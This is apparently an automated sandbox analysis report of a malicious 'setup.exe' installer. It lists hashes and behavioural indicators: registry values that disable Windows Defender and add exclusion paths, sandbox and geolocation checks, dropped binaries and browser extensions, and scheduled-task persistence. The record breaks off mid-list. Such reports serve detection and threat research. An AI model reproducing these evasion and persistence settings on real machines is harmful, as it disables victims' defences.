Analysis
-
max time kernel
259s -
max time network
267s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15/03/2024, 03:10
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7-20240221-en
General
-
Target
setup.exe
-
Size
7.4MB
-
MD5
625b00be8e2487faa87d04f06e929968
-
SHA1
534076635d3d0c2d0591dfba57ba898f37a9ad40
-
SHA256
a7257ef62555902f0a3c99801144fa3f8d28778686ab35ff63653daa31209d6c
-
SHA512
c6b818aa7f5b49ea24220be97554dc4f593e71c43635789c1e217fc6dc55bf165a520e4e5d145f529e87ec8b8710af2a1a419c61ffc055feacf00cd190f1dda8
-
SSDEEP
196608:91OHM32ml+yZVMUs4FkyqYeIdAAJZ89wtdkdPl24i0H:3OsVQyUZeeiAAA9wt0IR0H
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xWNndLwYWxPLC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SafQccDpCMVtGOrp = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FgzgbZZAFicU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LYowOqXOU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xWNndLwYWxPLC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SafQccDpCMVtGOrp = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PnlHXrUXYeUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uOkirCjeoMUvNKVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SafQccDpCMVtGOrp = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LYowOqXOU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SafQccDpCMVtGOrp = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FgzgbZZAFicU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PnlHXrUXYeUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uOkirCjeoMUvNKVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2572 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Control Panel\International\Geo\Nation PqwXfDa.exe -
Executes dropped EXE 4 IoCs
pid Process 2820 Install.exe 2952 Install.exe 1968 dzjaEcD.exe 692 PqwXfDa.exe -
Loads dropped DLL 12 IoCs
pid Process 2808 setup.exe 2820 Install.exe 2820 Install.exe 2820 Install.exe 2820 Install.exe 2952 Install.exe 2952 Install.exe 2952 Install.exe 2572 rundll32.exe 2572 rundll32.exe 2572 rundll32.exe 2572 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json PqwXfDa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json PqwXfDa.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol dzjaEcD.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini dzjaEcD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F PqwXfDa.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PqwXfDa.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 PqwXfDa.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D PqwXfDa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol dzjaEcD.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi PqwXfDa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PqwXfDa.exe File created C:\Program Files (x86)\FgzgbZZAFicU2\FhLTAysetvGYI.dll PqwXfDa.exe File created C:\Program Files (x86)\FgzgbZZAFicU2\ujBuEMk.xml PqwXfDa.exe File created C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\hekvmzu.dll PqwXfDa.exe File created C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\rHaDEbz.xml PqwXfDa.exe File created C:\Program Files (x86)\LYowOqXOU\hTyevY.dll PqwXfDa.exe File created C:\Program Files (x86)\LYowOqXOU\jBMOuxE.xml PqwXfDa.exe File created C:\Program Files (x86)\xWNndLwYWxPLC\haVzGfa.dll PqwXfDa.exe File created C:\Program Files (x86)\xWNndLwYWxPLC\wjCmfhm.xml PqwXfDa.exe File created C:\Program Files (x86)\PnlHXrUXYeUn\cGWCxCW.dll PqwXfDa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi PqwXfDa.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PqwXfDa.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ovLFxavpEMJUeWygf.job schtasks.exe File created C:\Windows\Tasks\bnTqljwkAIckBwCXiX.job schtasks.exe File created C:\Windows\Tasks\imJjYhUpaoZYZHtqO.job schtasks.exe File created C:\Windows\Tasks\PrqbyCvyRaPTCyA.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1916 schtasks.exe 2284 schtasks.exe 2316 schtasks.exe 1688 schtasks.exe 1888 schtasks.exe 1948 schtasks.exe 2312 schtasks.exe 2288 schtasks.exe 2980 schtasks.exe 2284 schtasks.exe 2360 schtasks.exe 2784 schtasks.exe 2260 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\WpadNetworkName = "Network 3" PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\72-29-ba-a5-b8-35 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs PqwXfDa.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-29-ba-a5-b8-35\WpadDecisionTime = 7003eff08676da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-29-ba-a5-b8-35\WpadDecision = "0" PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs PqwXfDa.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\WpadDecisionTime = 70eff2e28676da01 PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates PqwXfDa.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust PqwXfDa.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-29-ba-a5-b8-35 PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople PqwXfDa.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-29-ba-a5-b8-35 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\WpadNetworkName = "Network 3" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PqwXfDa.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\WpadDecision = "0" PqwXfDa.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\72-29-ba-a5-b8-35 PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My PqwXfDa.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PqwXfDa.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7CDFCD88-3843-49F1-BC09-1521509D1624}\WpadDecisionReason = "1" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople PqwXfDa.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates PqwXfDa.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed PqwXfDa.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-29-ba-a5-b8-35\WpadDecisionTime = 70eff2e28676da01 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 660 powershell.EXE 660 powershell.EXE 660 powershell.EXE 2552 powershell.EXE 2552 powershell.EXE 2552 powershell.EXE 2796 powershell.EXE 2796 powershell.EXE 2796 powershell.EXE 2140 powershell.EXE 2140 powershell.EXE 2140 powershell.EXE 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe 692 PqwXfDa.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 660 powershell.EXE Token: SeDebugPrivilege 2552 powershell.EXE Token: SeDebugPrivilege 2796 powershell.EXE Token: SeDebugPrivilege 2140 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2808 wrote to memory of 2820 2808 setup.exe 28 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2820 wrote to memory of 2952 2820 Install.exe 29 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2448 2952 Install.exe 31 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2952 wrote to memory of 2312 2952 Install.exe 33 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2448 wrote to memory of 2460 2448 forfiles.exe 35 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2312 wrote to memory of 2284 2312 forfiles.exe 36 PID 2460 wrote to memory of 2280 2460 cmd.exe 37 PID 2460 wrote to memory of 2280 2460 cmd.exe 37 PID 2460 wrote to memory of 2280 2460 cmd.exe 37 PID 2460 wrote to memory of 2280 2460 cmd.exe 37 PID 2460 wrote to memory of 2280 2460 cmd.exe 37 PID 2460 wrote to memory of 2280 